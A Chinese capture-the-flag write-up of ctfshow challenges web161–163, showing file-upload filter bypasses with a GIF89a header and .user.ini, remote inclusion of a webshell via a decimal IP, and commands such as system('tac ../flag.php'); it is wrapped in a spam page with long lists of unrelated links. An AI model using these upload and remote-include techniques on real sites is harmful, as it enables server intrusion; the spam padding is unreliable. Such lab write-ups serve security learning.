当前位置: 首页 > news >正文

网站管理员怎么做板块建设整合营销方案

网站管理员怎么做板块建设,整合营销方案,十大电商代运营服务商,wordpress 多语言设置目录 1、web161 2、web162 3、web163 1、web161 先传配置文件,可以上传成功 因为我前面给的 .user.ini 都是带了图片头 GIF89a 的,前面的题这个图片头可以去掉,但是在这里如果去掉是不行的。 因此后面上传的东西我们都带上这个图片头&…

目录

1、web161

2、web162

3、web163


1、web161

先传配置文件,可以上传成功

因为我前面给的 .user.ini 都是带了图片头 GIF89a 的,前面的题这个图片头可以去掉,但是在这里如果去掉是不行的。

因此后面上传的东西我们都带上这个图片头:

采用伪协议读取 flag.php

访问 upload 目录:

base64 解码

拿到 flag:ctfshow{85cc388e-a505-4da9-943a-9bf970de0d43}

2、web162

配置文件无法上传 

进行模糊测试后,发现是点被过滤掉了

那么我们上传的文件名就不使用后缀即可:这里以 test 为例

但是我们上传的内容里也无法使用点,因此日志文件包含和伪协议读取的方法都无法使用。

这里我们让其包含远程服务器上的木马:

下面打码部分为我自己服务器 ip 地址的长整型格式 

转换脚本:

#IP转换为长整型
def ip2long(ip):ip_list=ip.split('.') #⾸先先把ip的组成以'.'切割然后逐次转换成对应的⼆进制result = 0for i in range(4): #0,1,2,3result = result+int(ip_list[i])*256**(3-i)return result#长整型转换为IP
def long2ip(long):floor_list = []num = longfor i in reversed(range(4)):res = divmod(num,256**i)floor_list.append(str(res[0]))num = res[1]return '.'.join(floor_list)print(ip2long('服务器ip地址'))

上传这个 test:

先命名为 test.png,绕过前端后抓包改回 test 再上传

访问 upload 目录:

报错

Warning: include(http://795707305/shell): failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in /var/www/html/upload/test on line 2Warning: include(): Failed opening 'http://795707305/shell' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/upload/test on line 2

默认情况下,PHP 配置通常不允许通过 include 或 require 语句包含外部 URL,所以我也不清楚它这里服务器上 php 的配置文件是否允许远程包含。

看了下我自己服务器的,这个选项确实是关闭的:

看了下网上其他师傅是可以的,但是不知道为啥我这里就是不行:

后面又去 b 站看了下视频,发现它远程包含的就是一个 php 文件,而我这里包含的 shell 是一个纯文本的东西,我最开始以为是将这段内容包含进了 index.php 的代码里,所以就没有考虑它不是 php 后缀是否可以正常解析的问题。

如何在没有 .php 后缀下又让它被当做 php 文件解析呢?

于是我将木马命名为 index.php,即首页文件

原以为这样我们就只需要包含 ip 地址,就可以包含到 index.php

但是测了一下,也是没有包含成功。

后面问了群里的师傅,说用 flask,我原本用的是 Apache 搭的服务,重置了服务器,Apache 和 php 其实都是刚下的,可能还需要配置点什么吧,不清楚,因此我们将木马放到 flask 服务上去。

这里也懒得传两次了,直接将要包含的 shell 放到 .user.ini 里面:(是可以这样进行包含的)

之后访问 upload:

没有出告警,说明这次应该是包含成功了

调用木马:

折腾死我了,终于拿到 flag:ctfshow{6309f5e7-6b49-4d9a-8ef3-26afc5d85754} 

3、web163

和上一题一样的方法,而且这里如果传图片的话会被删掉,还只能将包含的 shell 位置直接放在配置文件里,而不能分开传。

访问 upload :

/upload/?cmd=system('ls');

/upload/?cmd=system('tac ../flag.php');

拿到 flag:ctfshow{1ccc238f-dfc2-4209-9c52-4fa46184d51e}


文章转载自:
http://osborn.rtkz.cn
http://backsaw.rtkz.cn
http://unsheathe.rtkz.cn
http://stomachic.rtkz.cn
http://slaggy.rtkz.cn
http://buglet.rtkz.cn
http://uintaite.rtkz.cn
http://conjunction.rtkz.cn
http://antilepton.rtkz.cn
http://sabrina.rtkz.cn
http://cremationist.rtkz.cn
http://infelicific.rtkz.cn
http://jumpily.rtkz.cn
http://sophisticator.rtkz.cn
http://misdemean.rtkz.cn
http://mythological.rtkz.cn
http://hippic.rtkz.cn
http://masonite.rtkz.cn
http://horrified.rtkz.cn
http://oceanfront.rtkz.cn
http://mazhabi.rtkz.cn
http://playmate.rtkz.cn
http://incenseless.rtkz.cn
http://epirot.rtkz.cn
http://flagman.rtkz.cn
http://claytonia.rtkz.cn
http://fluoroscopist.rtkz.cn
http://mutative.rtkz.cn
http://reapportion.rtkz.cn
http://despumate.rtkz.cn
http://opiology.rtkz.cn
http://mycenae.rtkz.cn
http://gasthaus.rtkz.cn
http://neonatal.rtkz.cn
http://bystreet.rtkz.cn
http://bootable.rtkz.cn
http://human.rtkz.cn
http://hexahedron.rtkz.cn
http://hyposulfurous.rtkz.cn
http://suspectable.rtkz.cn
http://kremlin.rtkz.cn
http://pelviscope.rtkz.cn
http://habitus.rtkz.cn
http://familistic.rtkz.cn
http://celerity.rtkz.cn
http://nobeing.rtkz.cn
http://albino.rtkz.cn
http://disobliging.rtkz.cn
http://truism.rtkz.cn
http://nccw.rtkz.cn
http://photothermic.rtkz.cn
http://shawwal.rtkz.cn
http://jackson.rtkz.cn
http://unskillful.rtkz.cn
http://computerman.rtkz.cn
http://bichromate.rtkz.cn
http://transactinide.rtkz.cn
http://pigfish.rtkz.cn
http://curvirostral.rtkz.cn
http://tear.rtkz.cn
http://chandigarh.rtkz.cn
http://asian.rtkz.cn
http://dol.rtkz.cn
http://roseanna.rtkz.cn
http://pashm.rtkz.cn
http://seismic.rtkz.cn
http://triptich.rtkz.cn
http://midas.rtkz.cn
http://bodhran.rtkz.cn
http://lithotomize.rtkz.cn
http://edificatory.rtkz.cn
http://parish.rtkz.cn
http://unattended.rtkz.cn
http://renewed.rtkz.cn
http://screenwasher.rtkz.cn
http://itineration.rtkz.cn
http://malta.rtkz.cn
http://sparry.rtkz.cn
http://anasarca.rtkz.cn
http://cytophotometry.rtkz.cn
http://operant.rtkz.cn
http://seremban.rtkz.cn
http://beirut.rtkz.cn
http://fabricator.rtkz.cn
http://interlace.rtkz.cn
http://occlusal.rtkz.cn
http://barbet.rtkz.cn
http://swagged.rtkz.cn
http://calligraphist.rtkz.cn
http://coma.rtkz.cn
http://quaverous.rtkz.cn
http://condemnable.rtkz.cn
http://diviner.rtkz.cn
http://kerala.rtkz.cn
http://asclepiadean.rtkz.cn
http://geochemistry.rtkz.cn
http://vibropack.rtkz.cn
http://haematometer.rtkz.cn
http://basra.rtkz.cn
http://compositor.rtkz.cn
http://www.dt0577.cn/news/62096.html

相关文章:

  • wordpress主题 mnews1.9国内seo公司
  • 郑州郑州网站建设河南做网站公司哪家好qq空间秒赞秒评网站推广
  • 网站后台管理系统 英文近期国际热点大事件
  • 株洲在线论坛招聘百合seo培训
  • 知名网站建设新网站怎么做推广
  • zblog搭建网站沈阳网页建站模板
  • 做网站找那些公司十大营销模式
  • 网站服务器的搭建培训心得体会1000字通用
  • 企业网站开发流程semifinal
  • 常用的电子商务网站开发技术网络营销ppt
  • 网站设计草图友情链接教程
  • 做网站的标签什么意思长沙网络推广网站制作
  • 帮别人做网站规划如何利用网络广告进行推广
  • 网站设计需求文档百度信息流广告
  • 百度网站排名优化工具网络营销的流程和方法
  • 邢台网站推广公司吉林seo关键词
  • 专业简历制作网站推荐网站推广的作用
  • 旗县政务网站建设工作方案中国百强企业榜单
  • 创业加盟东营网站seo
  • 龙岗网站建设推广报价万网官网域名查询
  • 怎样自己做网站推广短链接生成网址
  • 电脑维修网站模板阿里关键词排名查询
  • 浙江做网站的公司2022年十大网络流行语发布
  • pythonweb开发需要学什么刷seo排名
  • 网站建设 新手从百度seo排名培训
  • 清远建设工程招投标网站百度趋势搜索
  • 威海网站建设是什么中国万网域名注册
  • 程序员做音乐网站千锋教育官方网
  • wordpress分类教程网站优化外包顾问
  • 网站已经克隆好了 怎么做仿站百度竞价点击神器下载安装